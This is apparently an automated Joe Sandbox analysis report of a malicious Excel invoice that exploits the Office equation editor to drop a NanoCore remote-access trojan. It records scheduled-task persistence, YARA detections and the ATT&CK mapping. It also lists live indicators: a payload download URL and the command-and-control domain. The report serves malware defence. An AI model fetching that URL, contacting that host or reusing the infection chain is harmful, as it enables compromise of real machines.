ThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
        Source: ALP.exe, 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: ALP.exe, 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: smtpsvc.exe, 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: smtpsvc.exe, 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: smtpsvc.exe, 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: smtpsvc.exe, 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Process Injection112Disable or Modify Tools11Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery211Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading2Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol112Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483709 Sample: INVOICE = 212888585 .xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 56 godisgood1.hopto.org 2->56 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 18 other signatures 2->70 9 EQNEDT32.EXE 1 2->9         started        14 taskeng.exe 1 2->14         started        16 smtpsvc.exe 2->16         started        18 EXCEL.EXE 53 12 2->18         started        signatures3 process4 dnsIp5 58 136.144.41.96, 49165, 80 WORLDSTREAMNL Netherlands 9->58 52 C:\Users\user\AppData\Roaming\ALP.exe, PE32 9->52 dropped 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->80 20 ALP.exe 9->20         started        23 smtpsvc.exe 14->23         started        25 ALP.exe 14->25         started        82 Injects a PE file into a foreign processes 16->82 27 smtpsvc.exe 16->27         started        29 smtpsvc.exe 16->29         started        54 C:\Users\user\...\~$INVOICE = 212888585 .xlsx, data 18->54 dropped file6 signatures7 process8 signatures9 72 Multi AV Scanner detection for dropped file 20->72 74 Machine Learning detection for dropped file 20->74 76 Uses schtasks.exe or at.exe to add and modify task schedules 20->76 31 ALP.exe 1 11 20->31         started        78 Injects a PE file into a foreign processes 23->78 36 smtpsvc.exe 23->36         started        38 smtpsvc.exe 23->38         started        40 ALP.exe 25->40         started        process10 dnsIp11 60 godisgood1.hopto.org 103.147.184.84, 49166, 49167, 49168 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN unknown 31->60 46 C:\Program Files (x86)\...\smtpsvc.exe, PE32 31->46 dropped 48 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 31->48 dropped 50 C:\Users\user\AppData\Local\...\tmp3811.tmp, XML 31->50 dropped 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->62 42 schtasks.exe 31->42         started        44 schtasks.exe 31->44         started        file12 signatures13 process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        INVOICE = 212888585 .xlsx43%VirustotalBrowse
        INVOICE = 212888585 .xlsx50%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
        INVOICE = 212888585 .xlsx100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\ALP.exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe30%ReversingLabs
        C:\Users\user\AppData\Roaming\ALP.exe30%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        4.2.ALP.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
        17.2.smtpsvc.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
        4.2.ALP.exe.6c0000.3.unpack100%AviraTR/NanoCore.fadteDownload File
        16.2.smtpsvc.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
        14.2.ALP.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        godisgood1.hopto.org0%Avira URL Cloudsafe
        0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://136.144.41.96/HHK.exe0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        godisgood1.hopto.org
        		103.147.184.84
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          godisgood1.hopto.orgtrue
          • Avira URL Cloud: safe
          		unknown
          true
          • Avira URL Cloud: safe
          		low
          http://136.144.41.96/HHK.exetrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.%s.comPAALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          		low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmpfalse
            		high
            http://google.comALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmpfalse
              		high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              103.147.184.84
              		godisgood1.hopto.orgunknown
              		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
              136.144.41.96
              		unknownNetherlands
              		49981WORLDSTREAMNLtrue

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:483709
              Start date:15.09.2021
              Start time:11:56:16
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 43s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:INVOICE = 212888585 .xlsx
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:19
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winXLSX@26/9@18/2
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 1.8% (good quality ratio 1.8%)
              • Quality average: 94.6%
              • Quality standard deviation: 13.8%
              HCA Information:
              • Successful, ratio: 94%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
              • TCP Packets have been reduced to 100
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              11:56:48API Interceptor15x Sleep call for process: EQNEDT32.EXE modified
              11:56:49API Interceptor1529x Sleep call for process: ALP.exe modified
              11:56:52AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              11:56:54API Interceptor2x Sleep call for process: schtasks.exe modified
              11:56:55Task SchedulerRun new task: SMTP Service path: "C:\Users\user\AppData\Roaming\ALP.exe" s>$(Arg0)
              11:56:55Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
              11:56:56API Interceptor406x Sleep call for process: taskeng.exe modified
              11:57:01API Interceptor179x Sleep call for process: smtpsvc.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              136.144.41.96RFQ 13787.xlsxGet hashmaliciousBrowse
              • 136.144.41.96/AKI.exe
              Retha F. Fourie CV.xlsxGet hashmaliciousBrowse
              • 136.144.41.96/XNJ.exe
              CV Tarek Yehia.xlsxGet hashmaliciousBrowse
              • 136.144.41.96/XNO.exe

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              godisgood1.hopto.orgkGIBTCae7v.exeGet hashmaliciousBrowse
              • 103.156.91.208
              Vs57n7RHgP.exeGet hashmaliciousBrowse
              • 103.156.91.208
              v5rJN9eflV.exeGet hashmaliciousBrowse
              • 103.89.90.65
              VzzCzKHwT5.exeGet hashmaliciousBrowse
              • 103.167.85.222
              TT COPY.xlsxGet hashmaliciousBrowse
              • 103.167.85.222
              pYOaPT4Zks.exeGet hashmaliciousBrowse
              • 103.167.85.222
              v93t289icC.exeGet hashmaliciousBrowse
              • 103.155.81.71
              PO- SOHME202162312.exeGet hashmaliciousBrowse
              • 103.155.81.71
              BDH9YAC4aQ.exeGet hashmaliciousBrowse
              • 105.112.101.125
              JBIY8HTthL.exeGet hashmaliciousBrowse
              • 105.112.101.125

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              WORLDSTREAMNLzoD4YzpMMGGet hashmaliciousBrowse
              • 89.39.104.0
              RFQ 13787.xlsxGet hashmaliciousBrowse
              • 136.144.41.96
              jPxSe1Y8HV.exeGet hashmaliciousBrowse
              • 80.66.87.32
              9c2NwBeaMN.exeGet hashmaliciousBrowse
              • 185.177.125.94
              9gS8VdUFK6.apkGet hashmaliciousBrowse
              • 89.39.105.16
              7ErW9gaqY2.exeGet hashmaliciousBrowse
              • 185.177.125.94
              wJtL8lkk83.exeGet hashmaliciousBrowse
              • 185.177.125.94
              AMxo8mW9BE.exeGet hashmaliciousBrowse
              • 80.66.87.32
              Sy5c0DbxMw.exeGet hashmaliciousBrowse
              • 80.66.87.32
              kj1CaURZbn.exeGet hashmaliciousBrowse
              • 185.177.125.94
              7liS1YWCOy.exeGet hashmaliciousBrowse
              • 185.177.125.94
              da6332feebc2a530509de0c661231bbd427327c31d660.exeGet hashmaliciousBrowse
              • 185.177.125.94
              hhXB3QLUty.exeGet hashmaliciousBrowse
              • 185.177.125.94
              9c9cdb438163a2e64adcb398a6f1f1abcdc81c1cf35ab.exeGet hashmaliciousBrowse
              • 185.177.125.94
              2qE9TLzYDn.exeGet hashmaliciousBrowse
              • 185.177.125.94
              BIbA1NbNKy.exeGet hashmaliciousBrowse
              • 185.177.125.94
              U7986HO2mg.exeGet hashmaliciousBrowse
              • 185.177.125.94
              dJy1bkJwEWGet hashmaliciousBrowse
              • 178.132.6.150
              ACDC44F3C8B2B8B12A3E396A3D9F5D353D17DAB46B0E7.exeGet hashmaliciousBrowse
              • 136.144.41.201
              07985C9819097683B7F2BC59CC7D02E0497F012187E05.exeGet hashmaliciousBrowse
              • 136.144.41.201
              VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNCOAU7229898130.xlsxGet hashmaliciousBrowse
              • 103.133.106.199
              01_extracted.exeGet hashmaliciousBrowse
              • 103.147.185.192
              E00VS01_Payment_Copy.vbsGet hashmaliciousBrowse
              • 103.147.185.192
              ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
              • 103.133.106.199
              Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
              • 103.133.108.160
              V00GH01_Invoice_Copy.vbsGet hashmaliciousBrowse
              • 103.147.185.192
              Payment_and_invoice.vbsGet hashmaliciousBrowse
              • 103.147.184.73
              PO-PT. Hextar-Sept21.xlsxGet hashmaliciousBrowse
              • 103.133.106.199
              Invoice_and_payment_copy.vbsGet hashmaliciousBrowse
              • 103.147.184.73
              N00FX02Invoicecopy.vbsGet hashmaliciousBrowse
              • 103.147.185.192
              http___103.133.106.199_www_vbc.exeGet hashmaliciousBrowse
              • 103.133.106.199
              FED34190876.vbsGet hashmaliciousBrowse
